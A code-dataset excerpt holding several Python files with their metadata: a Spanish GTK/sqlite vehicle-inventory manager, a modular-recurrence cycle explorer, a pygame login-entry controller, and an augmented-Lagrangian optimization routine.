datos[7] == 'Vendido' ):\n color = '#D7D48A'\n else:\n color = '#FFA8A8'\n\n self.listaVehiculos.append( [datos[0], datos[1], datos[2], int( datos[3] ), datos[4], datos[5], datos[6], '%.2f' % datos[8], datos[7], datos[9], color, int( datos[10] ), datos[8]] )\n\n def vaciarCampos( self ):\n self.entryMatric.set_text( \"\" )\n self.entryMarca.set_text( \"\" )\n self.entryModelo.set_text( \"\" )\n self.entryKM.set_value( 0 )\n self.entryYear.set_value( 1980 )\n self.entryColor.set_text( \"\" )\n self.comboCombus.set_active( 0 )\n self.comboTipo.set_active( 0 )\n self.precioActual.set_text( \"0\" )\n\n def ventanaInsert( self, widget ):\n self.modo = \"I\"\n self.vaciarCampos()\n self.ventanaVehiculos.show()\n\n def ventanaEdit( self, widget ):\n \"Edita un vehiculo\"\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n\n with conn:\n c = conn.cursor()\n model, iterador = self.tvVehiculos.get_selection().get_selected()\n if iterador == None:\n Informacion.mensaje( \"Debe seleccionar un vehículo para editar\" )\n else:\n matric = model.get_value( iterador, 0 )\n marca = model.get_value( iterador, 1 )\n modelo = model.get_value( iterador, 2 )\n km = model.get_value( iterador, 3 )\n anno = model.get_value( iterador, 11 )\n color = model.get_value( iterador, 4 )\n combus = model.get_value( 
iterador, 5 )\n tipo = model.get_value( iterador, 6 )\n precio = model.get_value( iterador, 7 )\n\n self.entryMatric.set_text( matric )\n self.entryMarca.set_text( marca )\n self.entryModelo.set_text( modelo )\n self.ajuste.set_value( float( km ) )\n self.entryColor.set_text( color )\n self.comboCombus.set_active( 0 )\n self.comboTipo.set_active( 0 )\n self.precioActual.set_text( precio )\n self.entryYear.set_value( int( anno ) )\n\n self.modo = \"U\"\n\n self.ventanaVehiculos.show()\n\n def meterDatosBD( self, widget ):\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n\n try:\n matric = self.entryMatric.get_text()\n marca = self.entryMarca.get_text()\n modelo = self.entryModelo.get_text()\n km = self.entryKM.get_value()\n anno = self.entryYear.get_value()\n color = self.entryColor.get_text()\n precio = float( self.precioActual.get_text() )\n\n index = self.comboCombus.get_active()\n model = self.comboCombus.get_model()\n combus = model[index][0]\n\n index = self.comboTipo.get_active()\n model = self.comboTipo.get_model()\n tipo = model[index][0]\n\n if( ( matric != \"\" ) & ( marca != \"\" ) & ( modelo != \"\" ) & ( km != \"\" ) & ( color != \"\" ) & ( precio != \"\" ) ):\n with conn:\n c = conn.cursor()\n if ( self.modo == \"I\" ):\n sql = \"INSERT INTO tempvehiculos VALUES( ?,?,?,?,?,?,?,'Disponible',?, 0, ?) \"\n c.execute( sql, ( matric, marca, modelo, km, color, combus, tipo, precio, anno ) )\n conn.commit()\n self.listaVehiculosPedido = self.widgets.get_object( \"listCarritoPedido\" )\n self.listaVehiculosPedido.clear()\n sql = \"select * from tempvehiculos\"\n c.execute( sql )\n for datos in c:\n self.listaVehiculosPedido.append( [datos[0], datos[1], datos[2], datos[3], datos[4], datos[5], datos[6], datos[8]] )\n else:\n if( self.modo == \"U\" ):\n sql = \"UPDATE VEHICULOS SET matricula = ?, marca = ?, modelo = ?, km = ?, color = ?, combustible = ?, tipo = ?, precio = ?, anno = ? WHERE matricula = ? 
\"\n c.execute( sql, ( matric, marca, modelo, km, color, combus, tipo, precio, anno, matric ) )\n conn.commit()\n self.ventanaVehiculos.hide()\n self.listar( widget )\n self.vaciarCampos()\n Informacion.mensaje( \"Cambios guardados\" )\n else:\n Informacion.mensaje( \"Todos los datos son obligatorios\" )\n except sqlite3.IntegrityError:\n Informacion.mensaje( \"La matrícula introducida ya esta almacenada\" )\n\n def borrarVehiculo( self, widget ):\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n\n with conn:\n c = conn.cursor()\n model, iterador = self.tvVehiculos.get_selection().get_selected()\n if iterador == None:\n Informacion.mensaje( \"Debe seleccionar un vehículo para borrar\" )\n else:\n matr = model.get_value( iterador, 0 )\n marca = model.get_value( iterador, 1 )\n modelo = model.get_value( iterador, 2 )\n color = model.get_value( iterador, 4 )\n\n dialog = gtk.Dialog( \"Confirme borrado\", None, 0, ( gtk.STOCK_OK, gtk.RESPONSE_OK, gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL ) )\n dialog.set_default_size( 500, 300 )\n label = gtk.Label( \"Va a borrar un vehículo:\\n\\nMatrícula: \\t\\t\" + matr + \"\\nMarca: \\t\\t\" + marca + \"\\nModelo: \\t\\t\" + modelo + \"\\nColor: \\t\\t\" + color + \"\\n\\n¿Está seguro?\" )\n\n dialog.vbox.pack_start( label, True, True, 0 )\n dialog.show_all()\n\n response = dialog.run()\n dialog.destroy()\n if ( response == gtk.RESPONSE_OK ):\n c.execute( \"update vehiculos set estado ='Eliminado' WHERE matricula=?\", ( matr, ) )\n conn.commit()\n self.listar( widget )\n\n def comprobarMatricula( self, widget, data = None ):\n matricula = self.entryMatric.get_text().upper()\n self.entryMatric.set_text( matricula )\n if ( matricula != \"\" and self.modo != 'U' ):\n imagen = gtk.STOCK_YES\n\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n with conn:\n c = conn.cursor()\n sql = \"select matricula from vehiculos where matricula = ?\"\n c.execute( sql, ( matricula, ) )\n for datos in c:\n if ( matricula == datos[0] ):\n imagen = gtk.STOCK_NO\n\n self.imgMatric.set_from_stock( imagen, gtk.ICON_SIZE_SMALL_TOOLBAR )\n if imagen == gtk.STOCK_NO:\n self.bInsertar.set_sensitive( False )\n Informacion.mensaje( \"La matrícula introducida ya está almacenada.\" )\n else:\n self.bInsertar.set_sensitive( True )\n\n def imprimirListado( self, widget ):\n from fpdf import FPDF, HTMLMixin\n\n class MyFPDF( FPDF, HTMLMixin ):\n pass\n\n pdf = MyFPDF( orientation = 'L', unit = 'mm', format = 'A4' )\n pdf.add_page()\n\n pdf.set_font( 'Courier', '', 9 )\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n\n html = \"\"\"\n \n \n \n

    Lista de vehiculos

    \n \n \n '\n \n \n \"\"\"\n\n with conn:\n self.listaClientes = self.widgets.get_object( \"listClientes\" )\n c = conn.cursor()\n c.execute( self.sql )\n for datos in c:\n html += ''\n\n html += \"
    MatriculaMarcaModelo\"\"\" + lt( \"Año\" ) + \"\"\"KmColorCombustibleTipoProveedorPrecio
    ' + lt( str( datos[0] ) ) + '' + lt( str( datos[1] ) ) + '' + lt( str( datos[2] ) ) + '' + lt( str( datos[10] ) ) + '' + lt( str( datos[3] ) ) + '' + lt( str( datos[4] ) ) + '' + lt( str( datos[5] ) ) + '' + lt( str( datos[6] ) ) + '' + lt( str( datos[9] ) ) + '' + lt( str( datos[8] ) ) + '
    \"\n\n f1 = open( './testVehiculos.html', 'w+' )\n f1.write( html )\n f1.close()\n pdf.write_html( html )\n pdf.output( 'vehiculos.pdf' )\n\n import os\n os.system( '/usr/bin/evince vehiculos.pdf &' )\n", "sub_path": "Python/ConGesionario/Vehiculos.py", "file_name": "Vehiculos.py", "file_ext": "py", "file_size_in_byte": 12443, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "sqlite3.connect", "line_number": 55, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 74, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 121, "usage_type": "call"}, {"api_name": "Informacion.mensaje", "line_number": 128, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 155, "usage_type": "call"}, {"api_name": "Informacion.mensaje", "line_number": 196, "usage_type": "call"}, {"api_name": "Informacion.mensaje", "line_number": 198, "usage_type": "call"}, {"api_name": "sqlite3.IntegrityError", "line_number": 199, "usage_type": "attribute"}, {"api_name": "Informacion.mensaje", "line_number": 200, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 203, "usage_type": "call"}, {"api_name": "Informacion.mensaje", "line_number": 210, "usage_type": "call"}, {"api_name": "gtk.Dialog", "line_number": 217, "usage_type": "call"}, {"api_name": "gtk.STOCK_OK", "line_number": 217, "usage_type": "attribute"}, {"api_name": "gtk.RESPONSE_OK", "line_number": 217, "usage_type": "attribute"}, {"api_name": "gtk.STOCK_CANCEL", "line_number": 217, "usage_type": "attribute"}, {"api_name": "gtk.RESPONSE_CANCEL", "line_number": 217, "usage_type": "attribute"}, {"api_name": "gtk.Label", "line_number": 219, "usage_type": "call"}, {"api_name": "gtk.RESPONSE_OK", "line_number": 226, "usage_type": "attribute"}, {"api_name": "gtk.STOCK_YES", "line_number": 235, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 237, "usage_type": "call"}, {"api_name": "gtk.STOCK_NO", "line_number": 245, "usage_type": "attribute"}, {"api_name": "gtk.ICON_SIZE_SMALL_TOOLBAR", "line_number": 247, "usage_type": "attribute"}, {"api_name": "gtk.STOCK_NO", "line_number": 248, "usage_type": "attribute"}, {"api_name": "Informacion.mensaje", "line_number": 250, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 264, "usage_type": "call"}, {"api_name": "os.system", "line_number": 295, "usage_type": "call"}]} {"seq_id": "243740318", "text": "#! 
/usr/bin/env -S /usr/bin/time /usr/bin/python3.9 -i\n\n# -*- coding: utf-8 -*-\n\n# Some other needed imports\nimport datetime\nimport dill\nimport gzip\nimport os\nimport pdb\nimport re\nimport sys\nimport traceback\n\nimport numpy as np\nimport pandas as pd\nimport multiprocessing as mp\n\nimport matplotlib.pyplot as plt\n\nfrom collections import defaultdict\nfrom copy import deepcopy, copy\nfrom dotmap import DotMap\nfrom functools import reduce\nfrom hashlib import sha256\nfrom io import BytesIO\nfrom memory_tempfile import MemoryTempfile\nfrom shutil import copyfile\nfrom pprint import pprint\nfrom typing import List, Set, Tuple, Dict, Union, Any\nfrom PIL import Image\n\nfrom multiprocessing.managers import SharedMemoryManager\n\nCURRENT_WORKING_DIR = os.getcwd()\nPATH_ROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nHOME_DIR = os.path.expanduser(\"~\")\nTEMP_DIR = MemoryTempfile().gettempdir()\nPYTHON_PROGRAMS_DIR = os.path.join(HOME_DIR, 'git/python_programs')\n\n# set the relative/absolute path where the utils_load_module.py file is placed!\nsys.path.append(PYTHON_PROGRAMS_DIR)\nfrom utils_load_module import load_module_dynamically\n\nvar_glob = globals()\nload_module_dynamically(**dict(var_glob=var_glob, name='utils', path=os.path.join(PYTHON_PROGRAMS_DIR, \"utils.py\")))\nload_module_dynamically(**dict(var_glob=var_glob, name='utils_multiprocessing_manager', path=os.path.join(PYTHON_PROGRAMS_DIR, \"utils_multiprocessing_manager.py\")))\nload_module_dynamically(**dict(var_glob=var_glob, name='different_combinations', path=os.path.join(PYTHON_PROGRAMS_DIR, \"combinatorics/different_combinations.py\")))\nload_module_dynamically(**dict(var_glob=var_glob, name='utils_graph_theory', path=os.path.join(PYTHON_PROGRAMS_DIR, \"graph_theory/utils_graph_theory.py\")))\n\nmkdirs = utils.mkdirs\nMultiprocessingManager = utils_multiprocessing_manager.MultiprocessingManager\nget_all_combinations_repeat = different_combinations.get_all_combinations_repeat\nget_cycles_of_1_directed_graph = utils_graph_theory.get_cycles_of_1_directed_graph\n\nOBJS_DIR_PATH = os.path.join(PATH_ROOT_DIR, 'objs')\nmkdirs(OBJS_DIR_PATH)\n\nPLOTS_DIR_PATH = os.path.join(PATH_ROOT_DIR, 'plots')\nmkdirs(PLOTS_DIR_PATH)\n\ndef convert_num_to_base_num(n, b, min_len=-1):\n    def gen(n):\n        while n > 0:\n            yield n % b\n            n //= b\n    l = [i for i in gen(n)]\n    return l if min_len == -1 else l+[0]*(min_len - len(l) if min_len > len(l) else 0)\n\ndef get_num_from_base_lst(l, b):\n    n = 0\n    mult = 1\n    for i, v in enumerate(l, 0):\n        n += v*mult\n        mult *= b\n    return n\n\nif __name__ == '__main__':\n    # print('Hello World!')\n    argv = sys.argv\n    n = int(argv[1])\n    m = int(argv[2])\n\n    MAX_CYCLE_LEN = m**n\n\n    def get_missing_tpl_a(d_tpl_a):\n        s_all = set(range(0, MAX_CYCLE_LEN))\n        for k in d_tpl_a:\n            s_all.remove(get_num_from_base_lst(l=k, b=m))\n        missing_n = list(s_all)[0]\n        # print(\"- missing_n: {}\".format(missing_n))\n        l_a_missing = convert_num_to_base_num(n=missing_n, b=m, min_len=n)\n        tpl_a_missing = tuple(l_a_missing)\n        assert tpl_a_missing not in d_tpl_a\n        return tpl_a_missing\n\n    # s_cycle_len = set()\n    d_cycle_len = {}\n    for iters in range(0, 100000):\n        if iters % 1000 == 0:\n            print(\"iters: {}\".format(iters))\n\n        arr_a = np.random.randint(0, m, (n, ))\n\n        k0 = np.random.randint(0, m, (1, ))[0]\n        arr_v_k = np.random.randint(0, m, (n, ))\n\n        # k0 = 0\n        # arr_v_k[0] = 2\n\n        l_a = arr_a.tolist()\n\n        tpl_a = tuple(arr_a.tolist())\n        tpl_a_prev = tpl_a\n        d_tpl_a = {tpl_a: 0}\n        nr_tpl_a = 1\n        while True:\n
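            # One step of the lagged affine recurrence a[t] = (k0 + sum_k v[k]*a[t-n+k]) mod m.\n            # Hedged worked example: with m=3, k0=1, v=[1, 2] and window a=[2, 0],\n            # the next symbol is (1 + 1*2 + 2*0) % 3 == 0.\n            a_next = (k0 + 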
np.sum(arr_v_k * arr_a)) % m\n arr_a[:-1] = arr_a[1:]\n arr_a[-1] = a_next\n\n tpl_a_prev = tpl_a\n tpl_a = tuple(arr_a.tolist())\n \n if tpl_a in d_tpl_a:\n break\n\n d_tpl_a[tpl_a] = nr_tpl_a\n nr_tpl_a += 1\n \n cycle_len = d_tpl_a[tpl_a_prev] - d_tpl_a[tpl_a] + 1\n if cycle_len not in d_cycle_len:\n d_cycle_len[cycle_len] = {\n 'k0': k0,\n 'l_v_k': arr_v_k.tolist(),\n 'l_a': sorted(d_tpl_a.keys())[0],\n 'd_tpl_a': d_tpl_a,\n 'tpl_a': tpl_a,\n 'tpl_a_prev': tpl_a_prev,\n }\n elif cycle_len == MAX_CYCLE_LEN - 1:\n d = d_cycle_len[cycle_len]\n if 'missing_tpl_a' not in d:\n d['missing_tpl_a'] = get_missing_tpl_a(d_tpl_a=d['d_tpl_a'])\n else:\n missing_tpl_a = get_missing_tpl_a(d_tpl_a=d_tpl_a)\n l11 = list(reversed(d['missing_tpl_a']))\n l12 = list(reversed(missing_tpl_a))\n\n l21 = d['l_v_k']\n l22 = arr_v_k.tolist()\n if l11 > l12 or l11 == l12 and l21 > l22:\n d['k0'] = k0\n d['l_v_k'] = arr_v_k.tolist()\n d['l_a'] = sorted(d_tpl_a.keys())[0]\n d['d_tpl_a'] = d_tpl_a\n d['tpl_a'] = tpl_a\n d['tpl_a_prev'] = tpl_a_prev\n d['missing_tpl_a'] = missing_tpl_a\n\n l_cycle_len = sorted(d_cycle_len.keys())\n max_cycle_len = l_cycle_len[-1]\n print(f\"n: {n}, m: {m}, l_cycle_len: {l_cycle_len}\")\n\n print(f\"d_cycle_len[{max_cycle_len}]: {d_cycle_len[max_cycle_len]}\")\n", "sub_path": "modulo_sequences/vector_1d_multi_linear_sequences.py", "file_name": "vector_1d_multi_linear_sequences.py", "file_ext": "py", "file_size_in_byte": 5429, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.getcwd", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "memory_tempfile.MemoryTempfile", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "utils_load_module.load_module_dynamically", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils_load_module.load_module_dynamically", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "utils_load_module.load_module_dynamically", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "utils_load_module.load_module_dynamically", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": 
"call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 105, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 117, "usage_type": "call"}]} {"seq_id": "41997892", "text": "import os\nimport pygame\nfrom pygame.constants import KEYDOWN, K_RETURN, K_BACKSPACE, K_ESCAPE, K_TAB\n\nfrom ciu.cih.TelaMenu import TelaMenu\nfrom cln.cdp.EstiloElementos import EstiloElementos\nfrom cln.cdp.Posicao import Posicao\nfrom cln.cgt.AplPersistencia import AplPersistencia\nfrom principal.CaminhoRecursos import CaminhoRecursos\n\n_author__ = 'Hanna'\n\n\nclass ControladorCadastro:\n TAMANHO_LETRA_DADOS = 24\n POSICAOX_LETRA_DADOS = 228\n POSICAO_INICIAL_DADOS = 292\n INCREMENTA_ESPACAMENTO = 40\n TAMANHO_PALAVRA = 20\n POSICAO_SUBMIT = Posicao(372, 400)\n COR_PRETO = (0, 0, 0)\n COR_BRANCO = (255, 255, 255)\n TAMANHO_LETRA_MENU = 25\n POSICAOX_OPCAO_MENU = 115\n POSICAOY_INICIAL_OPCAO_MENU = 290\n\n def __init__(self):\n self.telamenu = TelaMenu()\n self.aplcadastrarjogador = AplPersistencia()\n self.lopcoes = [\"LOGIN:\", \"SENHA:\"]\n self.nomecorrente = []\n self.nome = \"\"\n self.posicaoimprimenome = self.POSICAO_INICIAL_DADOS\n self.imagemtela = \"\"\n self.buscar_imagem_tela()\n self.camposenha = False\n\n\n @staticmethod\n def get_imagem_geral(nomeimagem):\n return pygame.image.load(os.path.join(CaminhoRecursos.caminho_imagens_geral(), nomeimagem))\n\n def buscar_imagem_tela(self):\n self.imagemtela = self.get_imagem_geral(\"telacadastro.png\")\n\n def exibe_tela_informar_dados(self):\n self.telamenu.exibe_imagem(self.imagemtela, EstiloElementos.posicao_imagem_fundo())\n pygame.display.flip()\n\n def exibe_tela_mensagem_retorno(self, imagemtela):\n imagemtelamensagem = self.get_imagem_geral(imagemtela)\n self.telamenu.exibe_imagem(imagemtelamensagem, EstiloElementos.posicao_imagem_fundo())\n pygame.display.flip()\n\n @staticmethod\n def get_key():\n while True:\n event = pygame.event.poll()\n if event.type == KEYDOWN:\n return event.key\n\n def imprime_nome(self, dado, posicaoy):\n self.nome = \"\"\n for i in range(len(dado)):\n self.nome = self.nome + dado[i]\n palavraimpressa = self.nome\n if self.camposenha:\n palavraimpressa = \"*\" * len(self.nome)\n self.telamenu.exibe_texto_dados(palavraimpressa, self.TAMANHO_LETRA_DADOS, Posicao(self.POSICAOX_LETRA_DADOS, posicaoy))\n pygame.display.flip()\n\n def enviar_dados_jogador(self, ldadosjogador):\n return self.aplcadastrarjogador.cadastrar_jogador(ldadosjogador)\n\n def atualiza_entrada(self, ldadosjogador):\n self.exibe_tela_informar_dados()\n posicaoy = self.POSICAO_INICIAL_DADOS\n self.camposenha = False\n for dado in ldadosjogador:\n self.imprime_nome(dado, posicaoy)\n posicaoy += self.INCREMENTA_ESPACAMENTO\n if len(ldadosjogador) > 1:\n self.camposenha = True\n\n def cadastro(self):\n ldadosjogador = []\n while True:\n self.tecla = self.get_key()\n if self.tecla == K_RETURN or self.tecla == K_TAB:\n ldadosjogador.append(self.nome)\n self.nome = \"\"\n self.nomecorrente = []\n if len(ldadosjogador) == 
len(self.lopcoes):\n self.posicaoimprimenome = self.POSICAO_INICIAL_DADOS\n return self.enviar_dados_jogador(ldadosjogador)\n else:\n self.posicaoimprimenome = self.posicaoimprimenome + self.INCREMENTA_ESPACAMENTO\n self.camposenha = True\n elif self.tecla == K_BACKSPACE:\n if len(self.nomecorrente) > 0:\n self.nomecorrente.pop(-1)\n ldadosjogador.append(self.nomecorrente)\n self.atualiza_entrada(ldadosjogador)\n ldadosjogador.pop(-1)\n elif self.tecla == K_ESCAPE:\n return []\n elif self.tecla <= 127 and len(self.nomecorrente) < self.TAMANHO_PALAVRA:\n self.nomecorrente.append(chr(self.tecla))\n self.imprime_nome(self.nomecorrente, self.posicaoimprimenome)\n", "sub_path": "ciu/cci/ControladorCadastro.py", "file_name": "ControladorCadastro.py", "file_ext": "py", "file_size_in_byte": 4103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "cln.cdp.Posicao.Posicao", "line_number": 20, "usage_type": "call"}, {"api_name": "ciu.cih.TelaMenu.TelaMenu", "line_number": 28, "usage_type": "call"}, {"api_name": "cln.cgt.AplPersistencia.AplPersistencia", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 41, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "principal.CaminhoRecursos.CaminhoRecursos.caminho_imagens_geral", "line_number": 41, "usage_type": "call"}, {"api_name": "principal.CaminhoRecursos.CaminhoRecursos", "line_number": 41, "usage_type": "name"}, {"api_name": "cln.cdp.EstiloElementos.EstiloElementos.posicao_imagem_fundo", "line_number": 47, "usage_type": "call"}, {"api_name": "cln.cdp.EstiloElementos.EstiloElementos", "line_number": 47, "usage_type": "name"}, {"api_name": "pygame.display.flip", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cln.cdp.EstiloElementos.EstiloElementos.posicao_imagem_fundo", "line_number": 52, "usage_type": "call"}, {"api_name": "cln.cdp.EstiloElementos.EstiloElementos", "line_number": 52, "usage_type": "name"}, {"api_name": "pygame.display.flip", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.event.poll", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.constants.KEYDOWN", "line_number": 59, "usage_type": "name"}, {"api_name": "cln.cdp.Posicao.Posicao", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pygame.constants.K_RETURN", "line_number": 89, "usage_type": "name"}, {"api_name": "pygame.constants.K_TAB", "line_number": 89, "usage_type": "name"}, {"api_name": "pygame.constants.K_BACKSPACE", "line_number": 99, "usage_type": "name"}, {"api_name": "pygame.constants.K_ESCAPE", "line_number": 105, "usage_type": "name"}]} {"seq_id": "288018524", "text": "from __future__ import division, print_function, absolute_import\nimport math\nimport scipy.linalg\nimport matplotlib\nmatplotlib.use('Agg')\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import optimize as opt\nfrom matplotlib import rc\nrc('text', 
usetex=True)\n\n\ndef augmented_lagrangian(A_mats, p, n, m, k, plotting=False, printing=True, init=None):\n \"\"\"\n Returns the resulting local minimizer R of the BM problem.\n \"\"\"\n\n y = np.ones(m).reshape((-1, 1))\n R = np.random.uniform(-1, 1, size=(n, k))\n penalty = 1.0\n gamma = 10.0\n eta = .25\n target = .00000001\n vec = _Resid_vec(A_mats, m, p, R)\n v = vec.reshape((1, -1)).dot(vec)\n v_best = v\n while v > target:\n Rv = _matrix_to_vector(R)\n if printing == True:\n print('Starting L-BFGS-B on augmented Lagrangian...')\n optimizer = opt.minimize(lambda R_vec: _augmented_lagrangian_func(\n R_vec, A_mats, y, p, m, n, k, penalty), Rv, jac=lambda R_vec: _jacobian(R_vec, A_mats, p, m, n, y, penalty, k), method=\"L-BFGS-B\")\n if printing == True:\n print('Finishing L-BFGS-B on augmented Lagrangian...')\n R = _vector_to_matrix(optimizer.x, k)\n vec = _Resid_vec(A_mats, m, p, R)\n v = vec.reshape((1, -1)).dot(vec)\n if printing == True:\n print('Finish updating variables...')\n if v < eta * v_best:\n y = y - penalty * vec\n v_best = v\n else:\n penalty = gamma * penalty\n print(penalty)\n if printing == True:\n print('Augmented Lagrangian terminated.')\n return R\n\n\ndef _generate_random_rect(n, k):\n \"\"\"\n Returns a random initialization of matrix.\n \"\"\"\n\n R = np.random.uniform(-1, 1, (n, k))\n for i in range(n):\n R[i, :] = R[i, :] / np.linalg.norm(R[i, :])\n return R\n\n\ndef _basis_vector(size, index):\n \"\"\"\n Returns a basis vector with 1 on certain index.\n \"\"\"\n\n vec = np.zeros(size)\n vec[index] = 1\n return vec\n\ndef _Resid_vec(A_mats, m, p, R):\n \"\"\"\n Returns vector with constraint residuals\n \"\"\"\n vec = np.empty(m)\n Q = np.matmul(R, np.transpose(R))\n for i in range(m):\n vec[i] = np.trace(np.matmul(np.transpose(A_mats[i]),Q)) - p[i]\n return vec.reshape((-1,1))\n\n\ndef _augmented_lagrangian_func(Rv, A_mats, y, p, m, n, k, sigma):\n \"\"\"\n Returns the value of objective function of augmented Lagrangian.\n \"\"\"\n\n R = _vector_to_matrix(Rv, k)\n Resid = _Resid_vec(A_mats, m, p, R)\n first_term = np.dot(np.transpose(y), Resid)\n second_term = sigma/2.0 * np.dot(np.transpose(Resid), Resid)\n val = first_term + second_term\n\n return val\n\n\ndef _vector_to_matrix(Rv, k):\n \"\"\"\n Returns a matrix from reforming a vector.\n \"\"\"\n U = Rv.reshape((-1, k))\n return U\n\n\ndef _matrix_to_vector(R):\n \"\"\"\n Returns a vector from flattening a matrix.\n \"\"\"\n\n u = R.reshape((1, -1)).ravel()\n return u\n\n# def _take_one_row(Z, R, l):\n# Z[l,:] = R[l,:]\n# return Z\n\ndef _vec_dot_mats(mats, vec, n, m):\n \n sum = np.zeros((n,n))\n for i in range(m):\n sum = np.add(sum, vec[i]*mats[i])\n return sum\n\n\n\ndef _jacobian(Rv, A_mats, p, m, n, y, sigma, k):\n \"\"\"\n Returns the Jacobian matrix of the augmented Lagrangian problem.\n \"\"\"\n\n R = _vector_to_matrix(Rv, k)\n\n first_term = np.matmul(2.0*_vec_dot_mats(y, A_mats, n, m),R)\n\n second_term = np.matmul(2.0*sigma*_vec_dot_mats(_Resid_vec(A_mats, m, p, R), A_mats, n, m), R)\n\n jacobian = np.add(first_term, second_term)\n\n jac_vec = _matrix_to_vector(jacobian)\n \n return jac_vec.reshape((1, -1)).ravel()\n\n", "sub_path": "Augmented Lagrangian/augmented_lagrangian.py", "file_name": "augmented_lagrangian.py", "file_ext": "py", "file_size_in_byte": 3640, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "matplotlib.use", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.rc", "line_number": 10, 
"usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 19, "usage_type": "attribute"}, {"api_name": "scipy.optimize.minimize", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 31, "usage_type": "name"}, {"api_name": "numpy.random.uniform", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.trace", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 132, "usage_type": "call"}, {"api_name": 